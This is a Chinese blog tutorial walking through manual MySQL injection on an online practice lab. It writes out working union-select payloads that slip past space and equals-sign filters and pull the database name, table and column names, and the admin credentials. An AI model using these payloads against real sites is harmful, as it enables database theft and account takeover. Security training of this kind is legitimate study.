过滤mysql注入_MySQL手工注入进阶篇——突破过滤危险字符问题

最新推荐文章于 2022-01-29 14:56:34 发布
最新推荐文章于 2022-01-29 14:56:34 发布
阅读量253 收藏 1
点赞数
文章标签: 过滤mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42299150/article/details/113158419
版权
本文详细介绍了如何在遇到MySQL注入时,通过使用特殊字符替代、URL编码以及联合查询等方法绕过字符过滤,进行数据库的注入探测。包括判断注入点、确定字段数、爆库、爆表、爆字段以及解密密码的过程,展示了完整的手工注入进阶技巧。
摘要由CSDN通过智能技术生成

前言

当我们在进行手工注入时,有时候会发现咱们构造的危险字符被过滤了,接下来,我就教大家如何解决这个问题。下面是我的实战过程。这里使用的是墨者学院的在线靶场。咱们直接开始。

判断注入点

通过测试发现,这里过滤了空格和等于号。所以咱们用/**/代替空格,用like代替=,最后将构造的语句进行url编码,使用的是小葵转化工具。

所以咱们构造如下语句。

/**/and/**/1/**/like/**/1

结果如下图,页面正常显示。

724e04d5829f8bafe3639b52fcc5f875.png

接着咱们再构造如下语句。

/**/and/**/1/**/like/**/2

发现页面报错,说明存在注入点,且为数字型。如下图

65bdd671e078e11932376420a01c0f0c.png

判断字段数

通过 order by语句,咱们构造如下语句

/**/order/**/by/**/4

页面正常显示,如下图。

f475a060b22a14e9bfdedae9fdc8082d.png

接下来,咱们输入如下语句。

/**/order/**/by/**/5

发现页面报错,说明数据库里有四个字段,如下图。

5bba8a141ea7c6a853cd70e164b19e30.png

判断回显位置

通过联合查询,构造如下语句。这里有一点要注意:使用联合查询时,要使得前面不可查询,所以我将id=1改成了id=-1。

/**/union/**/select/**/1,2,3,4/**/#

结果如下图,我们发现,2,3,两个位置回显到页面上了。

43da32bf780541ad7388a215dbe22a77.png

爆库

通过上一步,咱们清楚了回显位置,接下来继续使用联合查询,构造如下语句。

/**/union/**/select/**/1,database(),3,4/**/#

结果去下图。咱们爆出了数据库名。

c17066be10630070db72bbf919c100ae.png

爆表

由于爆表构造得语句有点长,编码成url格式会更长。所以这里换成了burpsuite进行url编码。构造语句如下。

/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/库名(将库名转换成十六进制)

结果去下图,咱们爆出了两个表。

34ea2d37559e2693fd217d0962bdec58.png

爆字段

接下来咱们构造如下语句。

/**/union/**/select/**/1,group_concat(colunm_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/表名(转换成十六进制)

然后咱们发现了name,password,两个字段,如下图。

5a861e41849180048a018970193aa4ea.png

爆账号密码

这里咱们还用到了group_concat()函数,可以查询出所有账号和密码。构造如下语句。

/**/union/**/select/**/1,group_concat(name),group_concat(password),4/**/from/**/表名

结果如下图,查询出了管理员账号,密码。

d4774770f2dfd17238f4845080048f74.png

解密密码,登陆

我们发现查询出来得密码是加密得,然后通过在线解密得到密码,如下图。注入结束。

8266e553aa4999035846ae0b7584e57b.png

MySQL手工注入进阶篇实战总结

判断注入点,通过测试发现,过滤了空格,等于号,所以用/**/代替空格,用like代替等于号,构造的语句在进行url编码。

第一步,判断注入类型。构造语句 /**/and/**/1/**/like/**/1和 /**/and/**/1/**/like/**/2 发现报错。所以判断为数字型。

第二步,判断字段数,构造语句 /**/order/**/by/**/4和/**/order/**/by/**/5 发现4正常,5报错,说明有四个字段数。

第三步,爆库。构造语句 /**/union/**/select/**/1,database(),3,4/**/#

第四步,爆表。构造语句/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/库名(将库名转换成十六进制)

第五步,爆字段。构造语句 ​ 构造语句/**/union/**/select/**/1,group_concat(colunm_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/表名(转换成十六进制)

第六步,获取账户,密码。构造语句 /**/union/**/select/**/1,group_concat(name),group_concat(password),4/**/from/**/表名

第七步,解密,登陆。​

MikeE_3_14
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
刚才面试官问我你会 Mysql 吗,我一聊一个小时!
a6636656的博客
07-02 514
数据库是 “按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。比如看建表的语法: 3.MySql 的存储引擎有哪些? MyISAM、 InnoDB、BDB、MEMORY、MERGE、EXAMPLE、NDB Cluster、 ARCHIVE、CSV、BLACKHOLE、FEDERATED。Tips:InnoDB 和 BDB 提供事务安全表,其他存储引擎都是非事务安全表。1.Myisam 是 Mysql 的默认存储引擎,当 create
【进大厂必学】3W字180张图学习Linux基础总结
L的存在的博客
05-26 4338
就不多说这段时间干啥去了吧,期间和很多的同学聊了天,有的童鞋已经开始工作,聊了聊工作上的事儿。有的是今年即将毕业的童鞋,有着自己的小目标,有的想尝试互联网,所以现在基本上都快进行二轮的复习了,有的同学备战公务员,凭着年轻这股劲儿向往自己理想的生活状态,无论怎么样,长路漫漫,走一步,算一步,每一步都算数。 今天分享的这篇文章是 Linux 相关的基础知识,深一点的内容基本上没有,不过对于刚需小伙伴来说,也就够了,有时间的话,最好按照这些命令去试一试,敲一敲,这样记忆更加深刻。 老规矩,先看目录,文章比较长,建
XSS危险字符以及其处理方法
01-12
本文档包含了XSS危险字符的基本介绍,以及与其对应的在java以及JSP中的处理方法
PHP解决Xss跨域攻击以及sql注入危险字符串方案类库
HAIFU_XU
03-13 2996
由于该模块在项目中的要求是 不能提示任何信息,也不作断点操作,只作记录并且过滤危险参数。 主要功能:拦截攻击者注入恶意代码,可以防御诸如跨站脚本攻击(XSS)、SQL注入攻击等恶意攻击行为。 <?php /** * 安全模块 * 主要针对xss跨站攻击、sql注入等敏感字符串进行过滤 */ class safeMode{ /** * 执行过滤 * @
防止sql注入:替换危险字符
weixin_33759269的博客
04-26 557
在用户名或者密码框中输入“11‘ or ’1‘ = '1”时,生成的sql语句将为“selec * from userInfo where name = '11' or '1' = '1' and pwd = '11' or '1' = '1'”;该语句永远为真。为了防止sql语句的注入,提高程序的安全性。需要替换危险字符。 Java代码段: public class Ch...
mysql 注入过滤
aini6223017的博客
03-11 242
//表单过滤public function _safe($str) { $html_string = array("&amp;", "&nbsp;", "'", '"', "<", ">", "\t", "\r"); $html_clear = array("&", " ", "&#39;", "&quot;", "&amp...
mysql 危险字符_C#验证用户输入信息是否包含危险字符串的方法
weixin_30805181的博客
01-27 252
本文实例讲述了C#验证用户输入信息是否包含危险字符串的方法。分享给大家供大家参考。具体分析如下:这个C#函数可以用于表单输入数据的后端验证,判断用户是否提交了一些sql相关的危险注入字符 /// /// 检测客户输入的字符串是否有效,并将原始字符串修改为有效字符串或空字符串/// 当检测到客户的输入中有攻击性危险字符串,则返回false,有效返回true。/// /// 要检测的字符串public...
攻防世界-web高手进阶区
zji
04-25 5994
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
红队专题-渗透工具-sqlmap
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
一些不错的网页
墨鱼菜鸡
12-06 2347
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
php中url传递中文字符,特殊危险字符的解决方法
12-18
我们需要在url中传递中文字符或是其它的html等特殊字符,似乎总会有各种乱,不同的浏览器对他们的编码又不一样, 对于中文,一般的做法是: 把这些文本字符串传给url之前,先进行urlencode($text)一下; 但是对于一些很“危险”的字符,比如说html字符,甚至是SQL注入相关的字符,如果很明显的传给系统,出于安全考虑,系统一般都会把它们过滤掉的。 现在,我们需要这些危险字符,该这么办? 我想到的办法是 先给它们 base64_encode($text) 编码,到服务端时,又给它们 base64_decode($text) 解码, 貌似很完美,但是在使用的过程中又遇到一个问题,bas
检测是否有Sql危险字符
热门推荐
希望能找到你的答案
03-05 12万+
#region IsSafeSqlString 检测是否有Sql危险字符 /// &lt;summary&gt; /// 检测是否有Sql危险字符 /// &lt;/summary&gt; /// &lt;param name="targetString"&gt;目标字符串&lt;/param&gt; ...
过滤mysql注入_mysql 注入过滤
weixin_29235923的博客
01-18 224
//表单过滤public function _safe($str) {$html_string = array("&", "", "'", '"', "", "\t", "\r");$html_clear = array("&", " ", "'", """, "<", ">", " ", "");$js_string = array("//isU");$js_...
linux c 语言编程如何把串口字符串数据写到txt文件中_收藏 | 15 个你非了解不可的 Linux 特殊字符,妈妈再也不用担心我看不懂这些符了!
weixin_39568232的博客
11-21 182
不知道大家接触 Linux 系统有多久了,可曾了解过 Linux 中有哪些特殊的字符呢?其实啊,那些特殊字符都大有用处呢,今天的文章就给大家简单地科普一下 Linux 中你需要了解的 15 个特殊字符,想学或刚学 Linux 的小伙伴赶紧上车了为! ~ 主目录 这个波浪 ~ 指的是主目录,也就是我们用户的个人目录,无论你身在何方,输入 cd ~ 它将带你回家! cd ~ 更高端的玩法就是在它后面...
php危险字符,url传递中文字符,特殊危险字符的解决方案(仅供参考)urldecode、base64_encode...
weixin_39624367的博客
03-12 291
web开发的过程中,当我们需要在url中传递中文字符或是其它的html等特殊字符时,似乎总会碰到各种各样的小问题,因为不同的浏览器对他们的编码又不一样。对于中文,一般的做法是:把这些文本字符串传给url之前,先进行urlencode($text)一下。但是对于一些很“危险”的字符,比如说html字符,甚至是SQL注入相关的字符,如果很明显的传给系统,出于安全考虑,系统一般都会把它们过滤掉的。那么,...
mysql 过滤字符_mysql自动过滤特殊字符的解决方法
weixin_35710005的博客
01-26 1212
mysql会自动过滤特殊字符。像" " "(双引)、" ' "(单引)、"\"等都在插入数据的时候被mysql数据库自己过滤了。网上有人使用什么SQL注入,反正我也不懂。我是用的C语言连接数据库,想插入文件路径(包含反斜杠),所以就自己写了一个函数处理要插入的字符串。将字符串里的“\”全改为“\\”。void *convertToDBStr(char *dest, const char *sr...
突破 Sql 防注入过滤程序继续注入的一点方法、经验、技巧总结
eldn__的专栏
04-16 2565
现在网上流传很多防注入代码。这些真的有用吗?这是在网上找的一个防注入代码 例如: ''''--------定义部份------------------  Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr  ''''自定义需要过滤的字串,用 "|" 分隔  Fy_In = "''''|;|and|exec|insert|sel
mysql 危险字符_PHP过滤指定字符串,过滤危险字符
weixin_39828457的博客
01-19 292
安全过滤函数,用于过滤危险字符function safe_replace($string) {$string = str_replace('','',$string);$string =str_replace(''','',$string);$string =str_replace(''','',$string);$string =str_replace('*','',$string);$stri...
php 判断危险字符,php: 中文字符串- 危险字符串处理
weixin_30941189的博客
04-15 283
在编辑php时常遇到中文乱码问题。在此将 php在处理中文时,视为 “危险字符串”避免 中文乱码的方法:1. 将中文字符进行转码。通过: iconv 或 mb_convert_encoding 两个方法中的一个对字符串进行编码处理。2. 将中文字符串进行替换,将中文替换为其它字符串:例如以下方法,将中文替换为 下划线 "_"function replace_dangerous_char($file...
突破MySQL注入防御:绕过技巧与实操演示
MySQL注入绕过技术是一种高级的黑客攻击手段,针对那些依赖于关键词或函数过滤来防止SQL注入的数据库系统。演讲者Johannes Dahse来自德国Bochum,是一位IT安全领域的学生,专注于web安全研究,并且已经开发了PHP源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值